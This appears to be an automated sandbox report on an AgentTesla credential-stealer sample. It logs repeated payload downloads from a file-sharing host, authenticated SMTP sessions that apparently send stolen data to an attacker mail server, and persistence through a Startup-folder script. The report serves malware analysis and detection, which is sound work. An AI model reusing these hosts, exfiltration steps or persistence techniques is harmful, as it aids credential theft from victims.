                                                                                                        45192.168.2.450051194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:02:50 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:02:50 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:02:50 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:02:50 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        46192.168.2.450052194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:02:52 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:02:52 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:02:52 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:02:52 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        47192.168.2.450053194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:02:53 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:02:55 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:02:55 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:02:55 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        48192.168.2.450054194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:02:56 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:02:56 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:02:56 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:02:56 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        49192.168.2.450055194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:02:58 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:02:58 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:02:58 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:02:58 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        50192.168.2.450056194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:03:00 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:03:00 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:03:00 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:03:00 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        51192.168.2.450057194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:03:04 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:03:05 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:03:05 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:03:05 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        52192.168.2.450058194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:03:07 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        53192.168.2.450059194.15.112.248443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:03:08 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:03:09 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:03:08 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:03:09 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        SMTP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                        Jan 13, 2025 03:01:27.209188938 CET58749741162.254.34.31192.168.2.4220 server1.educt.shop ESMTP Postfix
                                                                                                        Jan 13, 2025 03:01:27.212176085 CET49741587192.168.2.4162.254.34.31EHLO 376483
                                                                                                        Jan 13, 2025 03:01:27.373385906 CET58749741162.254.34.31192.168.2.4250-server1.educt.shop
                                                                                                        250-PIPELINING
                                                                                                        250-SIZE 204800000
                                                                                                        250-ETRN
                                                                                                        250-STARTTLS
                                                                                                        250-AUTH PLAIN LOGIN
                                                                                                        250-AUTH=PLAIN LOGIN
                                                                                                        250-ENHANCEDSTATUSCODES
                                                                                                        250-8BITMIME
                                                                                                        250-DSN
                                                                                                        250 CHUNKING
                                                                                                        Jan 13, 2025 03:01:27.380131006 CET49741587192.168.2.4162.254.34.31AUTH login c2VuZHhhbWJyb0BlZHVjdC5zaG9w
                                                                                                        Jan 13, 2025 03:01:27.540518999 CET58749741162.254.34.31192.168.2.4334 UGFzc3dvcmQ6
                                                                                                        Jan 13, 2025 03:01:27.710961103 CET58749741162.254.34.31192.168.2.4235 2.7.0 Authentication successful
                                                                                                        Jan 13, 2025 03:01:27.711167097 CET49741587192.168.2.4162.254.34.31MAIL FROM:<sendxambro@educt.shop>
                                                                                                        Jan 13, 2025 03:01:27.875905037 CET58749741162.254.34.31192.168.2.4250 2.1.0 Ok
                                                                                                        Jan 13, 2025 03:01:27.876061916 CET49741587192.168.2.4162.254.34.31RCPT TO:<ambro@educt.shop>
                                                                                                        Jan 13, 2025 03:01:28.040913105 CET58749741162.254.34.31192.168.2.4250 2.1.5 Ok
                                                                                                        Jan 13, 2025 03:01:28.041059971 CET49741587192.168.2.4162.254.34.31DATA
                                                                                                        Jan 13, 2025 03:01:28.201571941 CET58749741162.254.34.31192.168.2.4354 End data with <CR><LF>.<CR><LF>
                                                                                                        Jan 13, 2025 03:01:28.202236891 CET49741587192.168.2.4162.254.34.31.
                                                                                                        Jan 13, 2025 03:01:28.475270033 CET58749741162.254.34.31192.168.2.4250 2.0.0 Ok: queued as EBBED6014F
                                                                                                        Jan 13, 2025 03:02:14.205748081 CET58749846162.254.34.31192.168.2.4220 server1.educt.shop ESMTP Postfix
                                                                                                        Jan 13, 2025 03:02:14.205988884 CET49846587192.168.2.4162.254.34.31EHLO 376483
                                                                                                        Jan 13, 2025 03:02:14.375113964 CET58749846162.254.34.31192.168.2.4250-server1.educt.shop
                                                                                                        250-PIPELINING
                                                                                                        250-SIZE 204800000
                                                                                                        250-ETRN
                                                                                                        250-STARTTLS
                                                                                                        250-AUTH PLAIN LOGIN
                                                                                                        250-AUTH=PLAIN LOGIN
                                                                                                        250-ENHANCEDSTATUSCODES
                                                                                                        250-8BITMIME
                                                                                                        250-DSN
                                                                                                        250 CHUNKING
                                                                                                        Jan 13, 2025 03:02:14.375389099 CET49846587192.168.2.4162.254.34.31AUTH login c2VuZHhhbWJyb0BlZHVjdC5zaG9w
                                                                                                        Jan 13, 2025 03:02:14.544811010 CET58749846162.254.34.31192.168.2.4334 UGFzc3dvcmQ6
                                                                                                        Jan 13, 2025 03:02:14.721260071 CET58749846162.254.34.31192.168.2.4235 2.7.0 Authentication successful
                                                                                                        Jan 13, 2025 03:02:14.722841024 CET49846587192.168.2.4162.254.34.31MAIL FROM:<sendxambro@educt.shop>
                                                                                                        Jan 13, 2025 03:02:14.891927958 CET58749846162.254.34.31192.168.2.4250 2.1.0 Ok
                                                                                                        Jan 13, 2025 03:02:14.892622948 CET49846587192.168.2.4162.254.34.31RCPT TO:<ambro@educt.shop>
                                                                                                        Jan 13, 2025 03:02:15.063920975 CET58749846162.254.34.31192.168.2.4250 2.1.5 Ok
                                                                                                        Jan 13, 2025 03:02:15.065931082 CET49846587192.168.2.4162.254.34.31DATA
                                                                                                        Jan 13, 2025 03:02:15.236329079 CET58749846162.254.34.31192.168.2.4354 End data with <CR><LF>.<CR><LF>
                                                                                                        Jan 13, 2025 03:02:15.237569094 CET49846587192.168.2.4162.254.34.31.
                                                                                                        Jan 13, 2025 03:02:15.525051117 CET58749846162.254.34.31192.168.2.4250 2.0.0 Ok: queued as F0B336014F

                                                                                                        Statistics

                                                                                                        CPU Usage

                                                                                                        Click to jump to process

                                                                                                        Memory Usage

                                                                                                        Click to jump to process

                                                                                                        High Level Behavior Distribution

                                                                                                        Click to dive into process behavior distribution

                                                                                                        Behavior

                                                                                                        Click to jump to process

                                                                                                        System Behavior

                                                                                                        General

                                                                                                        Target ID:0
                                                                                                        Start time:21:00:57
                                                                                                        Start date:12/01/2025
                                                                                                        Path:C:\Users\user\Desktop\rCHARTERREQUEST.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\Desktop\rCHARTERREQUEST.exe"
                                                                                                        Imagebase:0xd90000
                                                                                                        File size:149'112 bytes
                                                                                                        MD5 hash:9773F17F57D5A69D3A69EEC6DEF1A8A3
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1927556031.00000000043E6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1927556031.00000000043E6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1927556031.0000000004497000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1927556031.0000000004497000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1933791791.0000000006C70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1918032779.000000000318D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:low
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:4
                                                                                                        Start time:21:01:23
                                                                                                        Start date:12/01/2025
                                                                                                        Path:C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\ckuv.exe"
                                                                                                        Imagebase:0x570000
                                                                                                        File size:57'976 bytes
                                                                                                        MD5 hash:CDD3D1BB178C391A905C40D2B292F4D6
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        • Detection: 71%, ReversingLabs
                                                                                                        Reputation:low
                                                                                                        Has exited:false

                                                                                                        General

                                                                                                        Target ID:5
                                                                                                        Start time:21:01:24
                                                                                                        Start date:12/01/2025
                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                                        Imagebase:0x170000
                                                                                                        File size:42'064 bytes
                                                                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2386337733.0000000000542000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2386337733.0000000000542000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2390155026.0000000002601000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2390155026.0000000002601000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2390155026.000000000262C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2390155026.0000000002632000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:6
                                                                                                        Start time:21:01:36
                                                                                                        Start date:12/01/2025
                                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ilsucsfth.vbs"
                                                                                                        Imagebase:0x7ff6b5b00000
                                                                                                        File size:170'496 bytes
                                                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:7
                                                                                                        Start time:21:01:36
                                                                                                        Start date:12/01/2025
                                                                                                        Path:C:\Users\user\AppData\Roaming\ilsucsfth.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\ilsucsfth.exe"
                                                                                                        Imagebase:0xb20000
                                                                                                        File size:149'112 bytes
                                                                                                        MD5 hash:9773F17F57D5A69D3A69EEC6DEF1A8A3
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2409994915.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2409994915.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.2409994915.00000000043AF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.2409994915.0000000004235000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
